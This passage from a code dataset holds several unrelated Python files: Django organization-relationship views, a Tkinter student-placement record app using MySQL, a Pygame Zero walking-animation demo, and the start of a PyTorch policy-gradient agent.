'edit-organization-composition'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n\n parents = Q(compositionparent__value=context['organization'])\n children = Q(compositionchild__value=context['organization'])\n\n context['compositions'] = Composition.objects.filter(parents | children)\n context['memberships'] = MembershipOrganization.objects.filter(membershiporganizationmember__value=context['organization'])\n\n return context\n\n\nclass OrganizationDeleteCompositionView(OrganizationDeleteRelationshipView):\n model = Composition\n template_name = 'organization/delete-composition.html'\n\n\n def get_objects_to_update(self):\n composition = self.get_object()\n parent = composition.parent.get_value().value\n child = composition.child.get_value().value\n return parent, child\n\n def delete(self, request, *args, **kwargs):\n parent, child = self.get_objects_to_update()\n\n response = super().delete(request, *args, **kwargs)\n\n parent.object_ref_saved()\n child.object_ref_saved()\n\n return response\n\n\nclass OrganizationEditMembershipView(OrganizationEditView):\n template_name = 'organization/edit-membership.html'\n form_class = OrganizationMembershipForm\n model = MembershipOrganization\n context_object_name = 'current_membership'\n slug_field_kwarg = 'pk'\n button = 'relationships'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n 
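# --- Editor's note (hedged sketch): several views below repeat the same
# parents/children lookup in get_context_data(). A small mixin could
# centralize it; the names here are hypothetical, not part of the codebase:
#
#     class OrganizationRelationshipsMixin:
#         def get_relationship_context(self, organization):
#             parents = Q(compositionparent__value=organization)
#             children = Q(compositionchild__value=organization)
#             return {
#                 'compositions': Composition.objects.filter(parents | children),
#                 'memberships': MembershipOrganization.objects.filter(
#                     membershiporganizationmember__value=organization),
#             }
# --- end editor's note ---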
context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n\n parents = Q(compositionparent__value=context['organization'])\n children = Q(compositionchild__value=context['organization'])\n\n context['compositions'] = Composition.objects.filter(parents | children)\n context['memberships'] = MembershipOrganization.objects.filter(membershiporganizationmember__value=context['organization'])\n\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationCreateMembershipView(EditButtonsMixin, OrganizationCreateView):\n template_name = 'organization/create-membership.html'\n form_class = OrganizationCreateMembershipForm\n model = MembershipOrganization\n context_object_name = 'current_membership'\n slug_field_kwarg = 'pk'\n button = 'relationships'\n edit_url_name = 'edit-organization-membership'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n\n parents = Q(compositionparent__value=context['organization'])\n children = Q(compositionchild__value=context['organization'])\n\n context['compositions'] = Composition.objects.filter(parents | children)\n context['memberships'] = MembershipOrganization.objects.filter(membershiporganizationmember__value=context['organization'])\n\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationDeleteMembershipView(OrganizationDeleteRelationshipView):\n model = MembershipOrganization\n template_name = 'organization/delete-membership.html'\n\n def get_objects_to_update(self):\n membership = self.get_object()\n member = membership.member.get_value().value\n organization = membership.organization.get_value().value\n return member, organization\n\n def delete(self, request, *args, **kwargs):\n member, organization = self.get_objects_to_update()\n\n response = super().delete(request, *args, **kwargs)\n\n member.object_ref_saved()\n organization.object_ref_saved()\n\n return response\n\n # overriding the success and cancel urls since the model name is MembershipOrganization\n def get_success_url(self):\n organization_id = self.kwargs['organization_id']\n return reverse('create-organization-membership',\n kwargs={'organization_id': organization_id})\n\n def get_cancel_url(self):\n organization_id = self.kwargs['organization_id']\n pk = self.kwargs['pk']\n return reverse('edit-organization-membership',\n kwargs={'organization_id': organization_id,\n 'pk': pk})\n\n\nclass OrganizationEditPersonnelView(OrganizationEditView):\n model = MembershipPerson\n template_name = 'organization/edit-personnel.html'\n form_class = OrganizationPersonnelForm\n context_object_name = 'current_membership'\n slug_field_kwarg = 'organization_id'\n button = 'personnel'\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationCreatePersonnelView(EditButtonsMixin, OrganizationCreateView):\n model = MembershipPerson\n template_name = 'organization/create-personnel.html'\n form_class = OrganizationCreatePersonnelForm\n context_object_name = 'current_membership'\n slug_field_kwarg = 'organization_id'\n button = 'personnel'\n edit_url_name 
= 'edit-organization-personnel'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationDeletePersonnelView(OrganizationDeleteRelationshipView):\n model = MembershipPerson\n template_name = 'organization/delete-personnel.html'\n\n def get_objects_to_update(self):\n membership = self.get_object()\n person = membership.member.get_value().value\n organization = membership.organization.get_value().value\n return person, organization\n\n def delete(self, request, *args, **kwargs):\n person, organization = self.get_objects_to_update()\n\n response = super().delete(request, *args, **kwargs)\n\n person.object_ref_saved()\n organization.object_ref_saved()\n\n return response\n\n # overriding the success and cancel urls since the model name is MembershipPerson\n def get_success_url(self):\n organization_id = self.kwargs['organization_id']\n return reverse('create-organization-personnel',\n kwargs={'organization_id': organization_id})\n\n def get_cancel_url(self):\n organization_id = self.kwargs['organization_id']\n pk = self.kwargs['pk']\n return reverse('edit-organization-personnel',\n kwargs={'organization_id': organization_id,\n 'pk': pk})\n\n\nclass OrganizationEditEmplacementView(OrganizationEditView):\n model = Emplacement\n template_name = 'organization/edit-emplacement.html'\n form_class = OrganizationEmplacementForm\n context_object_name = 'current_emplacement'\n slug_field_kwarg = 'pk'\n button = 'location'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context['emplacements'] = [e.emplacement for e in context['organization'].emplacements]\n context['associations'] = [e.association for e in context['organization'].associations]\n\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationCreateEmplacementView(EditButtonsMixin, OrganizationCreateView):\n model = Emplacement\n template_name = 'organization/create-emplacement.html'\n form_class = OrganizationCreateEmplacementForm\n slug_field_kwarg = 'pk'\n button = 'location'\n edit_url_name = 'edit-organization-emplacement'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n context['emplacements'] = [e.emplacement for e in context['organization'].emplacements]\n context['associations'] = [e.association for e in context['organization'].associations]\n\n return context\n\n def get_form_kwargs(self):\n form_kwargs = super().get_form_kwargs()\n form_kwargs['organization_id'] = self.kwargs['organization_id']\n return form_kwargs\n\n\nclass OrganizationDeleteEmplacementView(OrganizationDeleteRelationshipView):\n model = Emplacement\n template_name = 'organization/delete-emplacement.html'\n\n def get_objects_to_update(self):\n emplacement = self.get_object()\n organization = emplacement.organization.get_value().value\n site = emplacement.site.get_value().value\n return organization, site\n\n def delete(self, request, *args, **kwargs):\n organization, _ = self.get_objects_to_update()\n\n response = 
super().delete(request, *args, **kwargs)\n\n organization.object_ref_saved()\n\n return response\n\n\nclass OrganizationEditAssociationView(OrganizationEditView):\n model = Association\n template_name = 'organization/edit-association.html'\n form_class = OrganizationAssociationForm\n context_object_name = 'current_association'\n slug_field_kwarg = 'pk'\n button = 'location'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context['emplacements'] = [e.emplacement for e in context['organization'].emplacements]\n context['associations'] = [e.association for e in context['organization'].associations]\n\n return context\n\n\nclass OrganizationCreateAssociationView(EditButtonsMixin, OrganizationCreateView):\n model = Association\n template_name = 'organization/create-association.html'\n form_class = OrganizationCreateAssociationForm\n slug_field_kwarg = 'pk'\n button = 'location'\n edit_url_name = 'edit-organization-association'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['organization'] = Organization.objects.get(uuid=self.kwargs['organization_id'])\n context['emplacements'] = [e.emplacement for e in context['organization'].emplacements]\n context['associations'] = [e.association for e in context['organization'].associations]\n\n return context\n\n\nclass OrganizationDeleteAssociationView(OrganizationDeleteRelationshipView):\n model = Association\n template_name = 'organization/delete-association.html'\n\n def get_objects_to_update(self):\n association = self.get_object()\n organization = association.organization.get_value().value\n area = association.area.get_value().value\n return organization, area\n\n def delete(self, request, *args, **kwargs):\n organization, _ = self.get_objects_to_update()\n\n response = super().delete(request, *args, **kwargs)\n\n organization.object_ref_saved()\n\n return response\n\n\ndef organization_autocomplete(request):\n term = request.GET.get('q')\n\n response = {\n 'results': []\n }\n\n if term:\n organizations = Organization.objects.filter(organizationname__value__icontains=term)[:10]\n\n for organization in organizations:\n result = {\n 'id': organization.id,\n 'text': organization.name.get_value().value,\n 'aliases': organization.alias_list,\n 'country': None,\n }\n\n if organization.division_id.get_value():\n result['country'] = country_name(organization.division_id.get_value().value)\n\n response['results'].append(result)\n\n return HttpResponse(json.dumps(response), content_type='application/json')\n\n\nclass OrganizationSitemap(Sitemap):\n\n protocol = 'http' if settings.DEBUG else 'https'\n\n def items(self):\n return Organization.objects.filter(published=True).order_by('id')\n\n def location(self, obj):\n return reverse('view-organization', args=[obj.uuid])\n","sub_path":"organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"139733966","text":"from tkinter import *\r\nfrom tkinter import ttk,messagebox\r\nfrom PIL import Image,ImageTk\r\nimport pymysql\r\nclass step1:\r\n def __init__(self,root):\r\n self.root=root\r\n self.root.title(\"Students Record Liabrary\")\r\n self.root.geometry(\"1550x800+0+0\")\r\n #self.bg=ImageTk.PhotoImage(file=\"images/logo.jpeg\")\r\n #self.bg_image=Label(self.frame1,image=self.bg).place(x=0,y=0)\r\n\r\n frame1 = Frame(self.root, bg=\"navy blue\")\r\n frame1.place(x=0, y=10, width=1550, 
height=130)\r\n\r\n frame1.Image = ImageTk.PhotoImage(file=\"images/logo.jpeg\")\r\n frame1.Image_pack = Label(self.root, image=frame1.Image).place(x=230, y=5, width=1000, height=140)\r\n\r\n frame2=Frame(self.root,bg=\"#10ac84\")\r\n frame2.place(x=0 ,y=150 , width=550 , height=700)\r\n\r\n #----------ALL VARIABLES=========\r\n self.text_Stu_Name_var=StringVar()\r\n self.text_Branch_var=StringVar()\r\n self.text_E_mail_var=StringVar()\r\n self.text_Contact_var=StringVar()\r\n self.cmb_Gender_var=StringVar()\r\n self.text_Company_var=StringVar()\r\n self.text_Package_var=StringVar()\r\n self.search_by=StringVar()\r\n self.search_text=StringVar()\r\n\r\n title = Label(frame2, text=\"Students Data\", font=(\"times new roman\", 30, \"bold\"), bg=\"navy blue\", fg=\"white\").place(x=0, y=10 ,width=550,height=40)\r\n\r\n\r\n Stu_Name = Label(frame2, text=\"Stu_Name\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=110)\r\n self.text_Stu_Name = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Stu_Name.place(x=250, y=110, width=290 , height=30)\r\n Branch = Label(frame2, text=\"Branch\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=170)\r\n self.text_Branch = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Branch.place(x=250 , y=170, width=290, height=30)\r\n E_mail = Label(frame2, text=\"E_mail\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=220)\r\n self.text_E_mail = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_E_mail.place(x=250, y=220, width=290, height=30)\r\n Contact = Label(frame2, text=\"Contact\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=280)\r\n self.text_Contact = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Contact.place(x=250, y=280, width=290, height=30)\r\n '''Gender = Label(frame2, text=\"Gender\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=350)\r\n self.text_Gender = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Gender.place(x=250, y=350, width=290, height=30)'''\r\n Gender = Label(frame2, text=\"Gender\", font=(\"times new roman\", 20, \"bold\"), bg=\"#10ac84\",fg=\"white\").place(x=30, y=350)\r\n self.cmb_Gender = ttk.Combobox(frame2, font=(\"times new roman\", 13), state='readonly', justify=CENTER)\r\n self.cmb_Gender['values'] = (\"Select\", \"Male\", \"Female\", \"Other\")\r\n self.cmb_Gender.place(x=250, y=350, width=250)\r\n self.cmb_Gender.current(0)\r\n #answer = Label(frame1, text=\"Answer\", font=(\"times new roman\", 20, \"bold\"), bg=\"white\", fg=\"gray\").place(x=30, y=240)\r\n #self.text_answer = Entry(frame1, font=(\"times new roman\", 15), bg=\"lightgray\")\r\n #self.text_answer.place(x=250, y=350, width=290,height=30)\r\n Company = Label(frame2, text=\"Company\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=410)\r\n self.text_Company = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Company.place(x=250, y=410, width=290, height=30)\r\n Package = Label(frame2, text=\"Package\", font=(\"times new roman\", 25, \"bold\"), bg=\"#10ac84\", fg=\"white\").place(x=30, y=460)\r\n self.text_Package = Entry(frame2, font=(\"times new roman\", 20), bg=\"white\")\r\n self.text_Package.place(x=250, y=460, width=290, height=30)\r\n\r\n frame3 = Frame(self.root, 
bg=\"#1dd1a1\")\r\n frame3.place(x=550, y=150, width=1000, height=830)\r\n title = Label(frame3, text=\"Placed Students Record\", font=(\"times new roman\", 30, \"bold\"), bg=\"navy blue\",fg=\"white\").place(x=2, y=10, width=1000,height=40)\r\n\r\n btn_Add = Button(self.root, text=\"Add\",command=self.add_data, font=(\"times new roman\", 20),bd=2, cursor=\"hand2\",bg=\"#5f27cd\",fg=\"white\").place(x=50, y=670, width=80,height=40)\r\n btn_Update = Button(self.root, text=\"Update\",command=self.update_data, font=(\"times new roman\", 20),bd=2, cursor=\"hand2\",bg=\"#5f27cd\",fg=\"white\").place(x=160, y=670, width=100 , height=40)\r\n btn_Delete = Button(self.root, text=\"Delete\",command=self.delete_data, font=(\"times new roman\", 20),bd=2, cursor=\"hand2\",bg=\"#5f27cd\",fg=\"white\").place(x=300, y=670, width=100 , height=40)\r\n btn_Clear = Button(self.root, text=\"Clear\",command=self.clear, font=(\"times new roman\", 20),bd=2, cursor=\"hand2\",bg=\"#5f27cd\",fg=\"white\").place(x=430, y=670, width=100 , height=40)\r\n btn_Search = Button(self.root, text=\"Search\",command=self.search_data, font=(\"times new roman\", 20), bd=2, cursor=\"hand2\", bg=\"white\",fg=\"navy blue\").place(x=1080, y=210, width=120, height=30)\r\n btn_ShowAll = Button(self.root, text=\"Show All\",command=self.fetch_data, font=(\"times new roman\", 20), bd=2, cursor=\"hand2\", bg=\"white\",fg=\"navy blue\").place(x=1230, y=210, width=120, height=30)\r\n btn_HomePage = Button(self.root, text=\"Home Page\",command=self.HomePage_Window, font=(\"times new roman\", 20), bd=2,cursor=\"hand2\", bg=\"white\", fg=\"navy blue\").place(x=1380, y=210, width=140, height=30)\r\n btn_Company = Button(self.root, text=\"Company Details\", command=self.Company_Window, font=(\"times new roman\", 20), bd=2, cursor=\"hand2\", bg=\"light green\", fg=\"navy blue\").place(x=170, y=730, width=200, height=40)\r\n\r\n\r\n\r\n #Search = Label(frame3, text=\"Students Data\", font=(\"times new roman\", 30, \"bold\")).place(x=0, y=50, width=550, height=40)\r\n #title = Label(frame3, text=\"Search By\", font=(\"times new roman\", 20, \"bold\"),bg=\"#fd79a8\").place(x=20, y=55)\r\n\r\n search = Label(frame3, text=\"Search:-\", font=(\"times new roman\", 20, \"bold\"), bg=\"#1dd1a1\", fg=\"white\").place(x=20, y=55)\r\n self.cmb_search = ttk.Combobox(frame3,textvariable=self.search_by,text=\"Select Option\", font=(\"times new roman\", 13), state='readonly', justify=CENTER)\r\n self.cmb_search['values'] = (\"Select Options\", \"Stu_Name\")\r\n self.cmb_search.place(x=120, y=60,height=30)\r\n self.cmb_search.current(0)\r\n\r\n self.cmb_search = Entry(frame3,textvariable=self.search_text, font=(\"times new roman\", 15), bg=\"white\",bd=2)\r\n self.cmb_search.place(x=350, y=60, width=150, height=30)\r\n\r\n frame4=Frame(frame3,bd=4,relief=RIDGE,bg=\"Red\")\r\n frame4.place(x=40, y=110, width=900, height=520)\r\n\r\n\r\n\r\n scroll_x=Scrollbar(frame4,orient=HORIZONTAL)\r\n scroll_y = Scrollbar(frame4,orient=VERTICAL)\r\n\r\n self.student_table=ttk.Treeview(frame4,columns=(\"Stu_Name\",\"Branch\",\"E_mail\",\"Contact\",\"Gender\",\"Company\",\"Package\"),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\r\n scroll_x.pack(side=BOTTOM,fill=X)\r\n scroll_y.pack(side=RIGHT,fill=Y)\r\n scroll_x.config(command=self.student_table.xview_scroll)\r\n scroll_y.config(command=self.student_table.yview_scroll)\r\n\r\n self.student_table.heading(\"Stu_Name\",text=\"Stu_Name\")\r\n self.student_table.heading(\"Branch\", text=\"Branch\")\r\n 
self.student_table.heading(\"E_mail\", text=\"E_mail\")\r\n self.student_table.heading(\"Contact\", text=\"Contact\")\r\n self.student_table.heading(\"Gender\", text=\"Gender\")\r\n self.student_table.heading(\"Company\", text=\"Company\")\r\n self.student_table.heading(\"Package\", text=\"Package\")\r\n self.student_table['show']='headings'\r\n self.student_table.column(\"Stu_Name\", width=170)\r\n self.student_table.column(\"Branch\", width=60)\r\n self.student_table.column(\"E_mail\", width=210)\r\n self.student_table.column(\"Contact\", width=80)\r\n self.student_table.column(\"Gender\",width=60)\r\n self.student_table.column(\"Company\", width=150)\r\n self.student_table.column(\"Package\", width=110)\r\n self.student_table.pack(fill=BOTH,expand=0.5)\r\n\r\n\r\n self.student_table.bind(\"\",self.get_cursor)\r\n self.fetch_data()\r\n\r\n\r\n\r\n def clear(self):\r\n self.text_Stu_Name.delete(0,END)\r\n self.text_Branch.delete(0, END)\r\n self.text_E_mail.delete(0, END)\r\n self.text_Contact.delete(0, END)\r\n self.text_Company.delete(0,END)\r\n self.text_Package.delete(0, END)\r\n self.cmb_Gender.current(0)\r\n #self.text_answer.delete(0, END)\r\n\r\n def add_data(self):\r\n if self.text_Stu_Name.get()==\"\" or self.text_Branch.get()==\"\" or self.text_E_mail.get()==\"\" or self.text_Company.get()==\"\" or self.cmb_Gender.get()==\"select\" or self.text_Package.get()==\"\":\r\n messagebox.showerror(\"Error\",\"All Fields Are Required\",parent=self.root)\r\n else:\r\n\r\n try:\r\n con=pymysql.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"student\")\r\n cur=con.cursor()\r\n cur.execute(\"INSERT INTO data values(%s,%s,%s,%s,%s,%s,%s)\",\r\n (self.text_Stu_Name.get(),\r\n self.text_Branch.get(),\r\n self.text_E_mail.get(),\r\n self.text_Contact.get(),\r\n self.cmb_Gender.get(),\r\n self.text_Company.get(),\r\n self.text_Package.get()\r\n ))\r\n\r\n con.commit()\r\n self.fetch_data()\r\n self.clear()\r\n messagebox.showinfo(\"Added\", \"Data Added Successfully\", parent=self.root)\r\n con.close()\r\n\r\n except Exception as es:\r\n messagebox.showerror(\"Error\",f\"Error due to: {str(es)}\",parent=self.root)\r\n\r\n\r\n\r\n def fetch_data(self):\r\n con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n cur = con.cursor()\r\n cur.execute(\"select * from data\")\r\n rows=cur.fetchall()\r\n if len(rows)!=0:\r\n self.student_table.delete(*self.student_table.get_children())\r\n for row in rows:\r\n self.student_table.insert('',END,values=row)\r\n con.commit()\r\n con.close()\r\n\r\n\r\n def get_cursor(self,ev):\r\n curosor_row=self.student_table.focus()\r\n contents=self.student_table.item(curosor_row)\r\n row=contents['values']\r\n print(row)\r\n self.text_Stu_Name.delete(\"1\",END)\r\n self.text_Stu_Name.insert(END,row[0])\r\n self.text_Branch.delete(\"2\",END)\r\n self.text_Branch.insert(END,row[1])\r\n self.text_E_mail.delete(\"3\",END)\r\n self.text_E_mail.insert(END,row[2])\r\n self.text_Contact.delete(\"4\",END)\r\n self.text_Contact.insert(END,row[3])\r\n self.cmb_Gender.delete(\"5\",END)\r\n self.cmb_Gender.insert(END,row[4])\r\n self.text_Company.delete(\"6\",END)\r\n self.text_Company.insert(END,row[5])\r\n self.text_Package.delete(\"7\",END)\r\n self.text_Package.insert(END,row[6])\r\n\r\n '''con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n cur = con.cursor()\r\n cur.execute(\"select * from data where E_mail=%s\")\r\n rows = cur.fetchall()\r\n if len(rows) != 0:\r\n 
self.student_table.delete(*self.student_table.get_children())\r\n            for row in rows:\r\n                self.student_table.insert('', END, values=row)\r\n            con.commit()\r\n            con.close()'''\r\n\r\n    def update_data(self):\r\n        con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n        cur = con.cursor()\r\n        cur.execute(\"UPDATE data SET Stu_Name=%s,Branch=%s,Contact=%s,Gender=%s,Company=%s,Package=%s where E_mail=%s\",\r\n                    (self.text_Stu_Name.get(),\r\n                     self.text_Branch.get(),\r\n                     self.text_Contact.get(),\r\n                     self.cmb_Gender.get(),\r\n                     self.text_Company.get(),\r\n                     self.text_Package.get(),\r\n                     self.text_E_mail.get()\r\n                     ))\r\n\r\n        con.commit()\r\n        self.fetch_data()\r\n        self.clear()\r\n        messagebox.showinfo(\"Updated\", \"Data Updated Successfully\", parent=self.root)\r\n        con.close()\r\n\r\n    def delete_data(self):\r\n        con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n        cur = con.cursor()\r\n        # parameters are passed as a one-element tuple; note the trailing comma\r\n        cur.execute(\"delete from data where E_mail=%s\", (self.text_E_mail.get(),))\r\n\r\n        con.commit()\r\n        con.close()\r\n        self.fetch_data()\r\n        self.clear()\r\n\r\n    def search_data(self):\r\n        con = pymysql.connect(host=\"localhost\", user=\"root\", password=\"\", database=\"student\")\r\n        cur = con.cursor()\r\n\r\n        cur.execute(\"select * from data where Stu_Name=%s\", (str(self.search_text.get()),))\r\n        rows = cur.fetchall()\r\n        if len(rows) != 0:\r\n            self.student_table.delete(*self.student_table.get_children())\r\n            for row in rows:\r\n                self.student_table.insert('', END, values=row)\r\n\r\n        con.commit()\r\n        con.close()\r\n\r\n    def HomePage_Window(self):\r\n        self.root.destroy()\r\n        import FrontPage\r\n\r\n    def Company_Window(self):\r\n        self.root.destroy()\r\n        import ComReg\r\n\r\n\r\n\r\nroot = Tk()\r\nobj = step1(root)\r\nroot.mainloop()\r\n","sub_path":"StuDetails.py","file_name":"StuDetails.py","file_ext":"py","file_size_in_byte":13799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"336909004","text":"import pgzrun  # import the game library\nWIDTH = 1200  # window width\nHEIGHT = 600  # window height\n\n# load all of the walk-cycle frame images and keep them in a list\nAnims = [Actor('1'), Actor('2'), Actor('3'),\n         Actor('4'), Actor('5')]\nnumAnims = len(Anims)  # number of animation frames\nanimIndex = 0  # index of the frame currently shown\nanimSpeed = 0  # counter used to pace the walking animation\n\nplayer_x = WIDTH/2  # player's x coordinate\nplayer_y = HEIGHT/2  # player's y coordinate\nfor i in range(numAnims):\n    Anims[i].x = player_x  # set the x coordinate of every frame\n    Anims[i].y = player_y  # set the y coordinate of every frame\n\ndef draw():  # drawing callback, runs every frame\n    screen.fill('gray')  # gray background\n    Anims[animIndex].draw()  # draw the player's current frame\n\ndef update():  # update callback, runs every frame\n    global animIndex, player_x, animSpeed\n    if keyboard.right:  # if the right arrow key is held\n        player_x += 5  # move the character to the right\n        for i in range(numAnims):  # update the x coordinate of every frame\n            Anims[i].x = player_x\n        if (player_x >= WIDTH):  # walked off the right edge\n            player_x = 0  # reappear at the left edge\n        animSpeed += 1  # counter used to pace the animation\n        if animSpeed % 5 == 0:  # animate at 1/5 of the movement rate\n            animIndex += 1  # advance one frame per tick\n            if animIndex >= numAnims:  # past the last frame\n                animIndex = 0  # wrap around to the first frame\n\npgzrun.go()  # start the game loop","sub_path":"PygameZero/python游戏趣味编程代码/第8章/8-8-3.py","file_name":"8-8-3.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"648677335","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport gym\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport time, pprint\nimport matplotlib.pyplot as plt\n\n\n# add observation with timestep t\n# policy gradient must 
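# --- Editor's note (hedged illustration): the TransitionBuffer below builds
# discounted reward-to-go incrementally; each newly stored reward r is added
# to every buffered step, scaled by gamma**(distance to the new step).
# Tiny check with gamma = 0.5 and rewards [1, 1, 1]:
#     G_0 = 1 + 0.5*1 + 0.25*1 = 1.75
#     G_1 = 1 + 0.5*1          = 1.5
#     G_2 = 1                  = 1.0
# i.e. G_t = sum_k gamma**k * r_(t+k), which matches
#     np.sum(gamma ** np.arange(n - t) * rewards[t:]) for each step t.
# --- end editor's note ---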
have positive rewards\n\nclass PolicyNet(nn.Module):\n def __init__(self, num_observations, num_actions):\n super().__init__()\n self.num_observations = num_observations\n self.fc1 = nn.Linear(num_observations, 64)\n self.fc2 = nn.Linear(64, num_actions)\n\n def forward(self, x):\n batch_size, num_input = x.size()\n assert num_input == self.num_observations, 'invalid num_input'\n x = F.relu(self.fc1(x))\n x = F.softmax(self.fc2(x), dim = 1)\n return x\n\nclass ValueNet(nn.Module):\n def __init__(self, num_observations):\n super().__init__()\n self.num_observations = num_observations\n self.fc1 = nn.Linear(num_observations, 64)\n self.fc2 = nn.Linear(64, 1)\n\n def forward(self, x):\n batch_size, num_input = x.size()\n assert num_input == self.num_observations, 'invalid num_input'\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return x\n\nclass Buffer(object):\n def __getitem__(self, key):\n return self.buffer.__getitem__(key)\n\n def __iter__(self):\n yield from self.buffer\n\nclass TrajectoryBuffer(Buffer):\n def __init__(self, buffer_size, gamma):\n self.buffer_size = buffer_size\n self.gamma = gamma\n self.reset()\n\n def store(self, *transition):\n self.transition_buffer.store(*transition)\n buffer_full = False\n done = transition[-1]\n if done:\n self.buffer.append(self.transition_buffer)\n self.transition_buffer = TransitionBuffer(self.gamma)\n if len(self.buffer) == self.buffer_size: buffer_full = True\n return buffer_full\n\n def reset(self):\n self.transition_buffer = TransitionBuffer(self.gamma)\n self.buffer = []\n\nclass TransitionBuffer(Buffer):\n def __init__(self, gamma):\n self.gamma = gamma\n self.buffer = None\n\n def store(self, observation, action, next_observation, reward, done):\n # transition: observation, next_observation, action, reward, future_rewards\n transition = np.concatenate((observation, next_observation, np.array([action, reward, 0]))).astype(np.float32)[np.newaxis, :]\n if self.buffer is None:\n self.buffer = transition\n else:\n self.buffer = np.concatenate((self.buffer, transition), axis = 0)\n # update the future rewards\n self.buffer[:, -1] += (self.gamma ** (np.arange(len(self.buffer), 0, -1)-1) * reward)\n if done: self.total_rewards = self.buffer.sum(axis = 0)[-2]\n\nclass Agent(object):\n def __init__(self, observation_space, action_space):\n # hyper parameters\n self.lr = 0.01\n self.gamma = 0.97\n self.batch_size = 1 #8\n self.reward_bias = 0\n # 'vanilla', 'future_rewards', 'actor_critic_mc', 'actor_critic_td'\n self.policy_gradient_method = 'actor_critic_mc'\n self.add_timestep_to_observation = True\n\n self.need_value_net = self.policy_gradient_method in ['actor_critic_mc', 'actor_critic_td']\n self.action_space = action_space\n self.actions = list(range(action_space.n))\n self.num_observations = np.prod(observation_space.shape)\n\t\t\n if self.add_timestep_to_observation: self.num_observations += 1\n self.policy_net = PolicyNet(self.num_observations, action_space.n)\n self.optimizer_policy = optim.Adam(self.policy_net.parameters(), lr = self.lr)\n\n if self.need_value_net:\n self.value_net = ValueNet(self.num_observations)\n self.optimizer_value = optim.Adam(self.value_net.parameters(), lr = self.lr)\n self.criterion = nn.MSELoss()\n self.batch_size = 1 # the batch size should be smaller when use actor critic\n self.trajectory_buffer = TrajectoryBuffer(self.batch_size, self.gamma)\n\n self.num_learns = 0\n self.debug_rewards = []\n\n def new_episode(self):\n self.loss_history = []\n self.loss_history_value = []\n\n def memorize(self, 
*transition):\n # observation, action, next_observation, reward, done\n buffer_full = self.trajectory_buffer.store(*transition)\n if buffer_full:\n self.learn()\n self.trajectory_buffer.reset()\n\n def choose_action(self, observation, optimal = False):\n actions_prob = self.policy_net(torch.tensor(observation[np.newaxis, :]).float())\n if optimal:\n action = self.actions[torch.argmax(actions_prob).item()]\n else:\n n = np.random.rand()\n for i, action in enumerate(self.actions):\n if n < actions_prob[0,i].item(): break\n n -= actions_prob[0,i].item()\n return action\n\n def learn(self):\n if self.num_learns == 0: print('start to learn...')\n loss = 0\n loss_value = 0\n for trajectory in self.trajectory_buffer:\n # transition: observation, next_observation, action, reward, future_rewards\n batch_observations, batch_next_observations, batch_actions, batch_rewards, batch_future_rewards = \\\n map(torch.tensor, [trajectory[:, 0:self.num_observations], trajectory[:, self.num_observations:2*self.num_observations], trajectory[:, -3], trajectory[:, -2], trajectory[:, -1]])\n batch_actions, batch_rewards, 